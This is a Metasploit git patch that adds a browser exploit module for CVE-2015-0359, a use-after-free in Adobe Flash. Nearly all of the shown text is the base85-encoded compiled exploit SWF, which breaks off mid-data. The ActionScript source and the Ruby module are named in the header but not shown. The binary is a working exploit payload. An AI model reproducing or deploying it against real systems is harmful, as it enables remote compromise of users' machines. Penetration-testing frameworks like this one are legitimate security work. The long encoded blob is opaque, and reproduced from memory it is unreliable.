From 51bb4b5a9b50dd6b4eee39fdf91c6f64503adb85 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 7 May 2015 17:00:00 -0500 Subject: [PATCH] Add module for CVE-2015-0359 --- data/exploits/CVE-2015-0359/msf.swf | Bin 0 -> 18109 bytes external/source/exploits/CVE-2015-0359/Msf.as | 261 ++++++++++++++++++ .../browser/adobe_flash_domain_memory_uaf.rb | 112 ++++++++ 3 files changed, 373 insertions(+) create mode 100755 data/exploits/CVE-2015-0359/msf.swf create mode 100755 external/source/exploits/CVE-2015-0359/Msf.as create mode 100644 modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb 
diff --git a/data/exploits/CVE-2015-0359/msf.swf b/data/exploits/CVE-2015-0359/msf.swf new file mode 100755 index 0000000000000000000000000000000000000000..4befa69648e84694b107659f46cd93a8efa0e9b3 GIT binary patch literal 18109 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≻PSz}3hZ{dveMDQ^M{L~_8=Ofvf(tD; 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 
